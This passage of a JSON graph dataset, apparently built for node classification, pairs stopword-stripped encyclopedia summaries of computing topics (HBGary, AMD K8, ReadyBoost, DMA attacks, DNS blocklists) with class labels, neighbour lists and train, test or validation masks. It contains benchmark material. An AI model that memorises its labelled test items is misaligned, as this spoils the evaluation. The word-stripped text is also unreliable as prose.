    "text": "HBGary:hbgary hbgary subsidiary company mantech international focused technology security past two distinct affiliated firms carried hbgary name hbgary federal sold products us federal government hbgary inc. clients included information assurance companies computer emergency response teams computer forensic investigators february 29 2012 hbgary inc. announced acquired services firm mantech international time hbgary federal reported closed company founded greg hoglund 2003 2008 joined mcafee security innovation alliance ceo made presentations black hat briefings rsa conference computer security conferences hbgary also analyzed ghostnet operation aurora events 2010 offices sacramento california washington d.c. bethesda maryland hbgary federal set aaron barr ceo instead hoglund provide services tools us government might require security clearance hbgary federal could meet revenue projections early 2011 negotiations sale hbgary federal progress two interested companies hbgary acquired mantech international february 2012 2010 aaron barr ceo hbgary federal alleged could exploit social media gather information hackers early 2011 barr claimed used techniques infiltrate anonymous partly using irc facebook twitter social engineering e-mails depict intention release information identities anonymous members b-sides conference sell possible clients including fbi e-mails barr explained identified list suspected anonymous members tracing connections social media main programmer criticized methodology communiqué anonymous denied association individuals barr named february 5–6 2011 anonymous compromised hbgary website copied tens thousands documents hbgary federal hbgary inc. posted tens thousands companies emails online usurped barr twitter account apparent revenge anonymous also claimed wiped barr ipad remotely though act remains unconfirmed anonymous group responsible attacks would go become lulzsec documents taken anonymous show hbgary federal working behalf bank america respond wikileaks planned release bank internal documents potential proactive tactics wikileaks include feeding fuel feuding groups disinformation creating messages around actions sabotage discredit opposing organization submitting fake documents wikileaks calling error additional emails published november 2016 wikileaks two employees hbgary referenced blog post endorsed manipulating translation software order 'mitigate damaging content within information leaks emails indicate palantir technologies berico technologies law firm hunton williams recommended bank america us justice department cooperated project e-mails appear show u.s. chamber commerce contracted firms spy discredit unions liberal groups conflict anonymous caused substantial public relations damage result involved organizations took steps distance hbgary hbgary federal reported hbgary federal contracted us government develop astroturfing software could create army multiple fake social media profiles later reported data security firm hbgary federal among persona management software contract bidders listed government website job ultimately awarded firm appear fedbizopps.gov page interested vendors contract awarded firm called ntrepid speaks wrote raw story hbgary made numerous threats cyber-attacks wikileaks dossier recently exposed emails revealed hbgary inc. working development new type windows rootkit code named magenta would undetectable almost impossible remove october 2010 greg hoglund proposed barr creating large set unlicensed windows 7 themes video games movies appropriate middle east asia would contain back doors part ongoing campaign attack support wikileaks products integrated products i.e recon digital dna responder 29 february 2012 mantech international announced purchase hbgary inc. financial terms acquisition disclosed say asset purchase excludes legal financial liabilities",
    "neighbors": [
      1024,
      5636,
      4117,
      8726,
      535,
      9761,
      4644,
      4133,
      9791,
      1608,
      3657,
      8779,
      4703,
      8288,
      8292,
      9319,
      10875,
      3711,
      5251,
      5764,
      2187,
      4240,
      1688,
      2717,
      9375,
      9904,
      9395,
      8886,
      704,
      3789,
      4304,
      4314,
      7899,
      9435,
      4830,
      3807,
      9441,
      2275,
      5349,
      1254,
      10477,
      9460,
      7418,
      2815,
      3843,
      10502,
      10003,
      7449,
      8478,
      297,
      2857,
      8489,
      11052,
      9518,
      1337,
      4940,
      8017,
      6484,
      857,
      1882,
      7515,
      4956,
      5479,
      3956,
      9082,
      899,
      6539,
      11152,
      10132,
      1946,
      1440,
      5024,
      5028,
      11175,
      5547,
      7601,
      1970,
      441,
      1979,
      4027,
      9664,
      8133,
      10190,
      4054,
      7639,
      8664,
      1504,
      9186,
      2542,
      507,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 8321,
    "label": 4,
    "text": "Eric_Corley:eric corley eric gordon corley born december 16 1959 also frequently referred pen name emmanuel goldstein figure hacker community directs non-profit organization 2600 enterprises inc. publishes magazine called associated monthly meet-ups around world hosts hacker convention hackers planet earth hope pseudonym derived fictional opposition leader george orwell dystopian novel nineteen eighty-four 1993 corley testified united states house representatives subcommittee telecommunications corley questioned relation content 2600 part discussions concerning digital telephony bill also known communications assistance law enforcement act corley editor best 2600 hacker odyssey released july 2008 book consists articles magazine set chronological order show evolution internet technology follow-up book dear hacker letters editor 2600 published 2010 corley host weekly radio programs hook wbai-fm wall wusb-fm hook often includes panel guests frequently centered technological topics wall usually narrated eric corley covered wide range topics hook air since 1988 corley directed 2001 film freedom downtime documentary incarcerations kevin mitnick bernie also examines alleged distortions mainstream media coverage mitnick case",
    "neighbors": [
      9433,
      4956,
      2261,
      10110
    ],
    "mask": "Test"
  },
  {
    "node_id": 8322,
    "label": 3,
    "text": "AMD_K8:amd k8 amd k8 hammer also code-named sledgehammer computer processor microarchitecture designed amd successor amd k7 athlon microarchitecture k8 first implementation amd64 64-bit extension x86 instruction set architecture processors based k8 core include k8 core similar k7 radical change integration amd64 instructions on-chip memory controller memory controller drastically reduces memory latency largely responsible performance gains k7 k8 perceived pc community use codename k8 athlon 64 processor family amd longer uses k-nomenclatures originally stood kryptonite since k-nomenclature naming convention beyond k8 appeared official amd documents press releases beginning 2005 amd refers codename k8 processors family 0fh processors 10h 0fh refer main result cpuid x86 processor instruction hexadecimal numbering 0f h h represents hexadecimal numbering equals decimal number 15 10 h equals decimal number 16 k10h form sometimes pops improper hybrid k code family identifier number",
    "neighbors": [
      3586,
      5380,
      8452,
      9092,
      6151,
      8327,
      10375,
      6924,
      5645,
      398,
      7963,
      2719,
      5922,
      5541,
      8231,
      11047,
      2094,
      7858,
      6978,
      7234,
      11331,
      9157,
      3783,
      11080,
      2764,
      473,
      7132,
      7913,
      5356,
      1005,
      5358,
      7788,
      1776,
      1137,
      9964,
      499,
      2549,
      630,
      3070
    ],
    "mask": "Train"
  },
  {
    "node_id": 8323,
    "label": 0,
    "text": "Natural_Language_Toolkit:natural language toolkit natural language toolkit commonly nltk suite libraries programs symbolic statistical natural language processing nlp english written python programming language developed steven bird edward loper department computer information science university pennsylvania nltk includes graphical demonstrations sample data accompanied book explains underlying concepts behind language processing tasks supported toolkit plus cookbook nltk intended support research teaching nlp closely related areas including empirical linguistics cognitive science artificial intelligence information retrieval machine learning nltk used successfully teaching tool individual study tool platform prototyping building research systems 32 universities us 25 countries using nltk courses nltk supports classification tokenization stemming tagging parsing semantic reasoning functionalities",
    "neighbors": [
      416,
      5635,
      7780,
      8262,
      5639,
      9577,
      8554,
      2059,
      7599,
      1044,
      2804,
      3127,
      2488,
      6174
    ],
    "mask": "Test"
  },
  {
    "node_id": 8324,
    "label": 9,
    "text": "Abstraction_principle_(computer_programming):abstraction principle computer programming software engineering programming language theory abstraction principle principle abstraction basic dictum aims reduce duplication information program usually emphasis code duplication whenever practical making use abstractions provided programming language software libraries principle sometimes stated recommendation programmer sometimes stated requirement programming language assuming self-understood abstractions desirable use origins principle uncertain reinvented number times sometimes different name slight variations read recommendation programmer abstraction principle generalized n't repeat principle recommends avoiding duplication information general also avoiding duplication human effort involved software development process recommendation programmer formulation benjamin c. pierce types programming languages 2002 abstraction principle reads emphasis original requirement programming language formulation david a. schmidt structure typed programming languages 1994 abstraction principle reads name abstraction principle appears long list books give necessarily incomplete list together formulation succinct principle plays central role design patterns object-oriented programming although writings topic give name principle influential book gang four states focus encapsulating concept varies theme many design patterns statement rephrased authors find varies encapsulate century principle reinvented extreme programming slogan definition principle rather succinct first appearance duplicate code later elaborated applicable issues software development automate every process worth automating find performing task many times script abstraction principle often stated context mechanism intended facilitate abstraction basic mechanism control abstraction function subroutine data abstractions include various forms type polymorphism elaborate mechanisms may combine data control abstractions include abstract data types including classes polytypism etc quest richer abstractions allow less duplication complex scenarios one driving forces programming language research design inexperienced programmers may tempted introduce much abstraction program—abstraction wo n't used complementary principle emphasize issue ai n't gon na need generally kiss principle since code usually subject revisions following abstraction principle may entail refactoring code effort rewriting piece code generically needs amortized estimated future benefits abstraction rule thumb governing devised martin fowler popularized rule three states piece code copied twice i.e would end three copies needs abstracted n't repeat dry principle generalization developed context multi-tier architectures related code necessity duplicated extent across tiers usually different languages practical terms recommendation rely automated tools like code generators data transformations avoid repetition addition optimizing code hierarchical/recursive meaning abstraction level programming also refers interfaces hardware communication layers also called abstraction levels abstraction layers case level abstraction often synonymous interface example examining shellcode interface higher lower level languages level abstraction changes operating system commands example c register circuit level calls commands example assembly binary case example boundary interface abstraction levels stack",
    "neighbors": [
      3712,
      8262,
      1936,
      5585,
      11574,
      2556
    ],
    "mask": "Test"
  },
  {
    "node_id": 8325,
    "label": 3,
    "text": "MCDRAM:mcdram multi-channel dram mcdram pronounced em cee dee ram 3d-stacked dram used intel xeon phi processor codenamed knights landing version hybrid memory cube developed partnership micron competitor high bandwidth memory many cores xeon phi processors along associated vector processing units enable consume many gigabytes per second traditional dram dimms supply multi-channel part mcdram full name reflects cores many channels available access mcdram processors access attached dimms high channel count leads mcdram high bandwidth 400+ gb/s although latencies similar dimm access physical placement processor imposes limits capacity 16 gb launch much smaller capacity off-package dram 384gb memory partitioned boot time used cache distant ddr remainder mapped physical address space application request pages virtual memory assigned either distant ddr directly portion ddr cached mcdram portion mcdram used cache one way via thecodice_1 api used cache latency miss accessing mcdram ddr slightly higher going directly ddr applications may need tuned avoid excessive cache misses",
    "neighbors": [
      3459,
      5380,
      3973,
      9095,
      5386,
      9611,
      4108,
      5649,
      5523,
      6804,
      8851,
      4886,
      9111,
      3352,
      11539,
      10669,
      9391,
      10548,
      1461,
      2237,
      5309,
      6339,
      5444,
      1998,
      2638,
      5073,
      1119,
      1000,
      7657,
      4204,
      5356,
      8684,
      5871,
      499,
      8820,
      3317,
      4217,
      5883,
      5503
    ],
    "mask": "Test"
  },
  {
    "node_id": 8326,
    "label": 2,
    "text": "Linux_for_mobile_devices:linux mobile devices learned article linux range use linux kernel-based operating systems ubiquitously found diverse hardware platforms article linux mobile devices use linux kernel-based operating systems sorts mobile devices whose primary human interface device hid touchscreen mainly comprises smartphones tablet computers also mobile phones personal digital assistants pdas portable media players come touchscreen separately list many linux kernel-based operating systems used mobile devices differ one another parts middleware entire middleware employ individual uis",
    "neighbors": [
      2560,
      516,
      5644,
      3089,
      5139,
      9237,
      10780,
      4637,
      3618,
      9257,
      2605,
      1584,
      9266,
      1083,
      10817,
      8772,
      8262,
      2134,
      3162,
      2658,
      6244,
      6763,
      2684,
      11391,
      2179,
      7812,
      10382,
      657,
      2195,
      9366,
      154,
      9882,
      6301,
      1694,
      10921,
      10933,
      4803,
      6352,
      3289,
      3802,
      10464,
      1761,
      4841,
      7920,
      2804,
      5369,
      7938,
      4360,
      1813,
      5410,
      1833,
      3886,
      815,
      5430,
      823,
      6968,
      1849,
      321,
      3395,
      3911,
      10063,
      4437,
      11095,
      4957,
      3422,
      863,
      10080,
      2914,
      4964,
      5989,
      10091,
      6508,
      7020,
      1394,
      9074,
      1396,
      1406,
      8576,
      3458,
      4995,
      7555,
      11654,
      4493,
      10127,
      11155,
      1431,
      9637,
      935,
      4011,
      428,
      9646,
      1456,
      8122,
      9660,
      10687,
      4040,
      457,
      5067,
      8147,
      477,
      9696,
      11232,
      1506,
      8675,
      8676,
      2021,
      9190,
      10732,
      1524,
      2036,
      5620
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8327,
    "label": 3,
    "text": "Alchemy_(microarchitecture):alchemy microarchitecture alchemy microarchitecture low power microprocessor design developed alchemy semiconductor implementing mips32 instruction set mips technologies first processor implementing au1 central processing unit products include amd alchemy au1000 au1550 sun ray 2 family thin clients. several cowon pmp devices dell drac5 remote administration cards airport extreme base station embedded products networking sun microsystems 4g systems mtx-1 accesscube meshcube alchemy semiconductor fabless semiconductor company based austin texas founded may 2000 purchased license mips architecture mips32 instruction set mips technologies developed au1 microprocessor au1000 au1550 socs alchemy semiconductor acquired amd 2002 summer 2006 sold alchemy processor line raza microelectronics december 2007 raza microelectronics changed name rmi corporation june 2009 netlogic microsystems acquired rmi 183.4 million stock september 2011 broadcom acquired netlogic shares transaction valued around 3.7bn",
    "neighbors": [
      3586,
      4098,
      5380,
      8322,
      9092,
      6151,
      8327,
      8711,
      10375,
      4235,
      5645,
      783,
      7445,
      2838,
      7963,
      4124,
      9851,
      2719,
      8481,
      5028,
      5541,
      11047,
      6057,
      426,
      938,
      8237,
      2094,
      10548,
      9665,
      6978,
      7234,
      1480,
      11080,
      2764,
      10316,
      473,
      6247,
      6250,
      5356,
      1005,
      6252,
      6253,
      1776,
      1137,
      760,
      6256,
      9964,
      2549,
      5237,
      1400,
      3451,
      3070
    ],
    "mask": "Test"
  },
  {
    "node_id": 8328,
    "label": 2,
    "text": "ReadyBoost:readyboost readyboost codenamed emd disk caching software component developed microsoft windows vista included later versions windows operating system readyboost enables nand memory mass storage devices including compactflash sd cards usb flash drives used write cache hard drive random access memory effort increase computing performance readyboost relies superfetch technology like superfetch adjusts cache based user activity features including readydrive implemented manner similar readyboost using readyboost-capable flash memory nand memory devices caching allows windows vista later service random disk reads better performance without cache caching applies disk content page file system dlls flash devices typically slower mechanical hard disk sequential i/o maximize performance readyboost includes logic recognizes large sequential read requests hard disk service requests compatible device plugged windows autoplay dialog offers additional option use flash drive speed system additional readyboost tab added drive properties dialog amount space used configured minimum cache size 250 mb vista fat32 formatting drive maximum 4 gb windows 7 ntfs exfat formatting maximum cache size 32 gb per device windows vista allows one device used windows 7 allows multiple caches one per device total 256 gb readyboost compresses encrypts data placed flash device aes-128 microsoft stated 2:1 compression ratio typical 4 gb cache would usually contain 8 gb data device compatible useful must conform requirements considerations readyboost available windows server 2008 according jim allchin future releases windows readyboost able use spare ram networked windows pcs system 512 mb ram minimum requirement windows vista see significant gains readyboost one test case adding 1 gb readyboost memory sped operation 11.7 seconds 2 seconds however increasing physical memory ram 512 mb 1 gb without readyboost reduced 0.8 seconds system performance readyboost monitored windows performance monitor price ram decreased ram installed computers mitigations provided readyboost systems insufficient memory decreased core idea readyboost flash memory e.g usb flash drive ssd much faster seek time typical magnetic hard disk less 1 ms allowing satisfy requests faster reading files hard disk also leverages inherent advantage two parallel sources read data whereas windows 7 enables use eight flash drives allowing nine parallel sources usb 2.0 flash drives slower sequential reads writes modern desktop hard drives desktop hard drives sustain anywhere 2 10 times transfer speed usb 2.0 flash drives equal slower usb 3.0 firewire ieee 1394 sequential data usb 2.0 faster flash drives faster random access times typically around 1 ms compared 12 ms mainstream desktop hard drives laptop computers performance shifts favor flash memory laptop memory expensive desktop memory many laptops also relatively slow 4200 rpm 5400 rpm hard drives versions vista prior sp1 readyboost failed recognize cache data upon resume sleep restarted caching process making readyboost ineffective machines undergoing frequent sleep/wake cycles problem fixed vista sp1 since flash drives wear finite though large number writes readyboost eventually wear drive uses according microsoft windows client performance group drive able operate least ten years",
    "neighbors": [
      8576,
      651,
      6797,
      10382,
      2193,
      9377,
      2339,
      935,
      1577,
      2221,
      7983,
      11568,
      10811,
      4926,
      2244,
      1098,
      5840,
      9972,
      3834
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8329,
    "label": 4,
    "text": "Privacy_software:privacy software privacy software software built protect privacy users software typically works conjunction internet usage control limit amount information made available third parties software apply encryption filtering various kinds privacy software refer two different types protection one type protecting user internet privacy world wide web software products mask hide user ip address outside world order protect user identity theft second type protection hiding deleting users internet traces left pc surfing internet software erase users internet traces software hide encrypt user traces others using pc know surfing one solution enhance privacy software whitelisting whitelisting process company identifies software allow try recognize malware whitelisting permits acceptable software run either prevents anything else running lets new software run quarantined environment verify validity whereas whitelisting allows nothing run unless whitelist blacklisting allows everything run unless black blacklist includes certain types software allowed run company environment example company might blacklist peer-to-peer file sharing systems addition software people devices web sites also whitelisted blacklisted intrusion detection systems designed detect types malicious network traffic computer usage detected firewall systems capture network traffic flows examine contents packet malicious traffic encryption another form privacy security organizations secure channel sending information use encryption stop unauthorized eavesdroppers encryption process converting original message form read anyone except intended receiver steganography sometimes used hide messages eavesdropping e-surveillance privacy different anonymity applicability usage anonymity subordinate privacy might desired exchange retrieval publication specific information uses privacy software free legal issues instance regulations export cryptography united states similarly key disclosure law also requires individuals surrender cryptographic keys law enforcement agencies encryption laws india also carry many legal restrictions diverse situations. ref name= http //perry4law.co.in/blog/ p=67 /ref talks also pipeline include cyber security technologies like encryption related software wassenaar arrangement thereby making export cumbersome. ref name= http //perry4law.co.in/cyber_security/ p=61 /ref",
    "neighbors": [
      673,
      2050,
      2818,
      5186,
      10341,
      2824,
      3629,
      11215,
      11198,
      4725,
      11319,
      119,
      1368,
      5373,
      8283,
      5245,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 8330,
    "label": 4,
    "text": "ESafe:esafe esafe protect previously known eliashim antivirus line software security products developed eliashim ltd. based haifa israel. distributed esafe technologies inc. seattle usa eliashim acquired aladdin knowledge systems december 1998. esafe protect consumer desktop version distributed aladdin discontinued 2002 following years esafe brand evolved gateway-based fully featured content security product sold aladdin knowledge systems integrated security appliance march 2009 aladdin knowledge systems merged safenet inc. esafe evolved become safenet esafe content security product line",
    "neighbors": [
      4760,
      1994,
      7327
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8331,
    "label": 4,
    "text": "Bitmessage:bitmessage bitmessage decentralized encrypted peer-to-peer trustless communications protocol used one person send encrypted messages another person multiple subscribers june 2013 software experienced surge new adoptions news reports email surveillance us national security agency bitmessage conceived software developer jonathan warren based design decentralized digital currency bitcoin software released november 2012 mit license bitmessage gained reputation reach warrantless wiretapping conducted national security agency nsa due decentralized nature protocol encryption difficult crack result downloads bitmessage program increased fivefold june 2013 news broke classified email surveillance activities conducted nsa bitmessage also mentioned experimental alternative email popular science cnet ransomware programs instruct affected users use bitmessage communicate attackers",
    "neighbors": [
      2050,
      4100,
      10631,
      4490,
      4746,
      5899,
      5391,
      1297,
      1810,
      11418,
      6519,
      2083,
      9764,
      10405,
      11046,
      4268,
      3629,
      7983,
      1456,
      10161,
      1970,
      7859,
      2228,
      3382,
      8758,
      1978,
      1087,
      8640,
      9281,
      7238,
      6602,
      7887,
      11088,
      6993,
      82,
      728,
      8283,
      3422,
      10850,
      7139,
      10341,
      9318,
      10726,
      8554,
      9451,
      9965,
      7794,
      5749,
      3959,
      251
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8332,
    "label": 4,
    "text": "DomainKeys:domainkeys domainkeys informally dk deprecated e-mail authentication system designed yahoo verify domain name e-mail sender message integrity aspects domainkeys along parts identified internet mail combined create domainkeys identified mail dkim widely used domainkeys dkim published may 2007 domainkeys historical protocol dkim standards-track replacement",
    "neighbors": [
      2848,
      8202,
      5421,
      9532,
      4793,
      2748
    ],
    "mask": "None"
  },
  {
    "node_id": 8333,
    "label": 4,
    "text": "DMA_attack:dma attack dma attack type side channel attack computer security attacker penetrate computer device exploiting presence high-speed expansion ports permit direct memory access dma dma included number connections lets connected device camcorder network card storage device useful accessory internal pc card transfer data computer maximum speed possible using direct hardware access read write directly main memory without operating system supervision interaction legitimate uses devices led wide adoption dma accessories connections attacker equally use facility create accessory connect using port potentially gain direct access part physical memory address space computer bypassing os security mechanisms lock screen read computer steal data cryptographic keys install run spyware exploits modify system allow backdoors malware preventing physical connections ports prevent dma attacks many computers connections implementing dma also disabled within bios uefi unused depending device nullify reduce potential type exploit examples connections may allow dma exploitable form include firewire cardbus expresscard thunderbolt pci pci express modern operating systems non-system i.e user-mode applications prevented accessing memory locations explicitly authorized virtual memory controller called memory management unit mmu addition containing damage may caused software flaws allowing efficient use physical memory architecture forms integral part security operating system however kernel-mode drivers many hardware devices user-mode vulnerabilities allow direct unimpeded access physical memory address space physical address space includes main system memory well memory-mapped buses hardware devices controlled operating system reads writes ordinary ram ohci 1394 specification allow devices performance reasons bypass operating system access physical memory directly without security restrictions sbp2 devices easily spoofed allowing operating system tricked allowing attacker read write physical memory thereby gain unauthorised access sensitive cryptographic material memory systems may still vulnerable dma attack external device firewire expresscard thunderbolt expansion port like pci pci express general connects attached devices directly physical rather virtual memory address space therefore systems firewire port may still vulnerable pcmcia/cardbus/pc card expresscard port would allow expansion card firewire installed attacker could example use social engineering attack send lucky winner rogue thunderbolt device upon connecting computer device direct unimpeded access physical address space would able bypass almost security measures os ability read encryption keys install malware control system devices attack also easily executed attacker physical access target computer addition abovementioned nefarious uses beneficial uses dma features used kernel debugging purposes tool called inception attack requiring machine expansion port susceptible attack another application known exploit vulnerability gain unauthorized access running windows mac os linux computers spyware finfirewire dma attacks prevented physical security potentially malicious devices kernel-mode drivers many powers compromise security system care must taken load trusted bug-free drivers example recent 64-bit versions microsoft windows require drivers tested digitally signed microsoft prevent non-signed drivers installed iommu technology applies concept virtual memory system busses may used close security vulnerability well increase system stability intel brands iommu vt-d. amd brands iommu amd-vi linux supports iommus use block i/o transactions allowed however iommus mostly used instead give guest virtual machines passthrough access host hardware newer operating systems may take steps prevent dma attacks recent linux kernels include option disable dma firewire devices allowing functions windows 8.1 prevent access dma ports unattended machine console locked never allowing sensitive data stored ram unencrypted another mitigation venue dma attacks however protection reading ram content enough writing ram via dma may compromise seemingly secure storage outside ram code injection example latter kind attack tresor-hunt exposes cryptographic keys never stored ram certain cpu registers tresor-hunt achieves overwriting parts operating system microsoft recommends changes default windows configuration prevent concern",
    "neighbors": [
      4163,
      4389,
      2630,
      4695,
      107,
      1515,
      3532,
      1614,
      6797,
      7983,
      3473,
      11539,
      6644,
      823,
      10392,
      4314,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 8334,
    "label": 4,
    "text": "Trusted_Email_Open_Standard:trusted email open standard trusted email open standard teos anti-spam technique proposed eprivacy group 2003 federal trade commission anti-spam summit edited stephen cobb cissp 35-page white paper describing standard downloaded 30,000 times publication april 2003 end year many elements teos later appeared letter microsoft ceo bill gates submitted u.s. senate commerce committee hearings anti-spam legislation letter outlined microsoft position spam crisis handled basic level teos proposes framework trusted identity email senders based secure fast lightweight signatures email headers optimized dns-based systems flexibility ease implementation teos also provides common-language framework making trusted assertions content individual message isps email recipients rely assertions manage email",
    "neighbors": [
      6762,
      119
    ],
    "mask": "None"
  },
  {
    "node_id": 8335,
    "label": 5,
    "text": "XIMSS:ximss xml interface messaging scheduling signaling ximss xml-based api ip communications ximss api introduced communigate systems communigate pro often referred cgp server starting version 5.1 summer 2006 announcement described ximss based open proposed standard ximss based previous xml rfcs clear whether formal proposal defining ximss standards body communigate explicitly specify rfc referring basis ximss server implementation ximss communigate pro applications publicly available using ximss communigate flash-based pronto integrated messaging client explicitly clear documentation whether ximss freely implemented servers clients without permission communigate description open implies level freedom expressed purpose ximss offer single client interface based widely-familiar open technologies i.e http xml complex communications services email calendaring im voip etc provided one server specified ximss intrinsically bound cgp server however specified functional scope clearly inspired cgp feature set",
    "neighbors": [
      5472,
      119,
      10271,
      4797,
      479
    ],
    "mask": "None"
  },
  {
    "node_id": 8336,
    "label": 6,
    "text": "MobilEcho:mobilecho mobilecho created grouplogic inc. mobile file management system iphone ipad first introduced may 23 2011 techcrunch disrupt new york city mobilecho information technology software securely integrating iphones ipads android phones tablets corporate file servers networks mobilecho installed corporate file servers departments installed iphones ipads android phones tablet computers users allows storage secure transfer files back forth directly servers iphones ipads android phones tablets mobilecho ios client grouplogic enterprise file sharing synching solution activecho january 2011 apple inc. stated 80 fortune 100 companies deployed tested ipad due consumerization enterprise – trend new technology emerging within consumer market first spreading enterprise organizations statistic increased 15 since october 2010 consumerization enterprise allowed employees bring personal tablet computers ipads work environment employees use connect corporate file server network trend raised security issues within enterprise employees unable bring corporate security infrastructure home ipads ios devices currently native file system accessible users inherently capable accessing corporate files without using third-party cloud providers like dropbox mobileme users emailing files workarounds believe compromise enterprise security",
    "neighbors": [
      9732,
      6539,
      7983,
      4623,
      5784
    ],
    "mask": "None"
  },
  {
    "node_id": 8337,
    "label": 4,
    "text": "Bounce_address:bounce address bounce address email address bounce messages delivered many variants name none used universally including return path reverse path envelope envelope sender mail 5321-from return address from_ errors-to etc uncommon single document use several names names refer email address provided mail command smtp session ordinarily bounce address seen email users without standardization name may cause confusion email message thought resembling traditional paper letter envelope header fields subject along body message analogous letterhead body letter normally presented visible user however envelope analogy contents mail rcpt fields smtp session neither normally visible user common information letter envelope values always case example electronic mailing lists information seen header come person sent email list bounce address set mailing list software problems delivering mailing list messages handled correctly envelope information looked resolve email go body email examined mail transfer agents mta using smtp protocol use rcpt command determine email go mail command indicate came original usage provide information return bounce messages since late 1990s uses come typically take advantage properties bounce address extended uses include mailing list handling variable envelope return path verp email authentication spam filtering backscatter reduction bounce address tag validation various terms different origins sometimes different meanings although differences often become moot modern internet",
    "neighbors": [
      3645,
      1125,
      6762,
      8202,
      5421,
      10167,
      9588,
      6261,
      9532,
      9909,
      4793,
      6492,
      3549,
      2527
    ],
    "mask": "None"
  },
  {
    "node_id": 8338,
    "label": 3,
    "text": "Migration_(virtualization):migration virtualization context virtualization guest simulation entire computer actually merely software virtual machine vm running host computer hypervisor migration also known teleportation process running virtual machine moved one physical host another little disruption service ideally process completely transparent resulting disruption service downtime practice always minor pause availability though may low enough hard real-time systems affected virtualization far frequently used network services user applications generally tolerate brief delays may involved perceived impact similar longer-than-usual kernel delay actual process heavily dependent particular virtualization package use general process follows note practice regular maintenance operations required merge snapshot stack manageable number files improve performance optimize storage redundant overwrites merged migration similar failover capability virtualization suites provide true failover host may suddenly completely failed precludes latest state vm copied backup host however backup host everything except latest changes may indeed able resume operation last known coherent state operations similar systems provide one capability may provide",
    "neighbors": [
      3450,
      2051
    ],
    "mask": "Test"
  },
  {
    "node_id": 8339,
    "label": 7,
    "text": "Grid_resource_allocation_manager:grid resource allocation manager globus resource allocation manager gram software component globus toolkit locate submit monitor cancel jobs grid computing resources provides reliable operation stateful monitoring credential management file staging gram provide job scheduler functionality fact front-end interoperability bridge functionality provided external scheduler natively support globus web service protocols jobs submitted gram targeted single computation resource consist optional input file staging phase job execution optional output file staging cleanup stage gram4 jobs described internally using job description language earlier gram system known gram2 predecessor resource specification language rsl used instead planning efforts underway enable future versions gram use job submission description language instead",
    "neighbors": [
      11353,
      10625
    ],
    "mask": "None"
  },
  {
    "node_id": 8340,
    "label": 1,
    "text": "Rocket_U2:rocket u2 rocket u2 suite database management dbms supporting software owned rocket software includes two multivalue database platforms unidata universe products operating environments run current unix linux windows operating systems derivatives pick operating system family also includes developer web-enabling technologies including systembuilder/sb+ sb/xa u2 web development environment webde uniobjects wintegrate universe originally developed vmark software unidata originally developed unidata corporation universe unidata used vertical application development embedded vertical software applications 1997 unidata corporation merged vmark systems form ardent software march 2000 ardent software acquired informix ibm subsequently acquired database division informix april 2001 making universe unidata part ibm db2 product family ibm subsequently created information management group data management one sub-areas ibm u2 family comprised unidata universe along tools systembuilder extensible architecture sb/xa u2 web development environment u2 web de wintegrate 1 october 2009 announced rocket software purchased entire u2 portfolio ibm u2 portfolio grouped name rocketu2 systems made one accounts accounts directories stored host operating system initially contain set files needed system function properly includes system voc vocabulary file contains every command filename keyword alias script pointers classes voc entries also created user files similar tables relational database file unique name distinguish files zero multiple unique records logically related files made two parts data file file dictionary dict data file contains records store actual data file dictionary may contain metadata describe contents output contents file hashed files u2 system uses hashing algorithm allocate file records groups based record ids searching data hashed file system searches group record id stored making search process efficient quicker searching whole file nonhashed files used store data little logical structure program source code xml plain text type file stored subdirectory within account directory host operating system may read edited using appropriate tools files made records similar rows within tables relational database record unique key called record id distinguish records file record ids typically hashed data retrieved quickly efficiently records including record ids store actual data pure ascii strings binary data stored u2 example hardware representation floating-point number would converted ascii equivalent stored usually records divided fields sometimes called attributes u2 field separated field mark hexadecimal character fe thus string codice_1 might represent record employee file 123-45-6789 record id john jones first field jjones company.com second field 4321.00 monthly salary stored third field up-arrow standard pick notation field mark xfe thus first three fields record including record id trailing field mark would use 49 bytes storage given value uses many bytes needed example another record file john jones 10 bytes may replaced marjorie q. humperdink 21 bytes yet name uses much storage needs plus one field mark fields may broken values even subvalues values separated value marks character xfd subvalues separated subvalue marks character xfc thus john jones happened get second email address record may updated codice_2 close bracket represents value mark since email address id record separate file sql terms outer join u2 terms translate provides reason u2 may classified multivalued database raw information called data record set logical grouped data e.g employee record data stored form fields/attributes like name address etc universe unidata structured basic language universe basic unibasic respectively similar pick/basic naturally operates structures multivalue database also structured database query language retrieve uniquery used select records processing ad hoc queries reports rocketu2 provides set client tools allow software developers access u2 databases software languages client tool interfaces include universe unidata support tls transport level data encryption record file level encryption data rest using openssl additional api encryption functionality also available allow custom solutions meet specific regulatory requirements rocketu2 offers three professional certification designations related u2 product family rocket software universe unidata limited ability create web-based front-ends universe/unidata content since rocket software provides sql access database products sql-based product used build web-based ui databases regardless using files tables u2 third-party application framework used build web interfaces",
    "neighbors": [
      2432,
      4255,
      6850,
      5051,
      5929,
      10286,
      7983,
      6993,
      10737,
      9075,
      5492,
      9780,
      4630,
      823,
      2043,
      3644,
      479
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8341,
    "label": 4,
    "text": "The_Abusive_Hosts_Blocking_List:abusive hosts blocking list abusive hosts blocking list ahbl internet abuse tracking filtering system developed summit open source development group based original summit blocking list 2000–2002 dnsbls shut jan 1 2015 appear blacklisting entire internet ahbl operated several dnsbl lists one rhsbl list use various types services data mostly added removed automatically ahbl preferred manage certain categories hand accuracy dnsbl list developed use smtp services real-time blocking system means data collected various sources 24 hours day 7 days week real time merged database data included spam sources open proxies open relays ddos drones usenet spam sources controversial shoot sight listing policy ircbl list reduced version dnsbl include spam sources data unnecessary use irc networks chat systems rhsbl list domain-based rather ip4r included domains owned and/or operated spammers known abusive domains domains used send e-mail request domain owner commonly used block domains address e-mail well surbl type systems scan links e-mail torbl list ip4r based list tor nodes included tor nodes including entrance transit exit nodes tor network list contained entrance transit nodes exit nodes ahbl recommends using torbl e-mail blocking purposes march 26 2014 blacklist administrator brielle bruns announced abusive hosts blocking list dnsbls shut ahbl site also published announcement several ahbl actions since creation led harsh criticism members spam fighting community overly aggressive unreasonable one example complete blocking spain largest internet service provider telefónica.es 6 months ever increasing amount spam illegal 419 coming rima-tde.net ip space ahbl also publicly spoken spamhaus .mail icann proposal later rejected icann ahbl also listed godaddy hosting services due continued hosting free speech store richard scoville attempted sue ahbl past listing escalated repeated attempts resolve issue godaddy 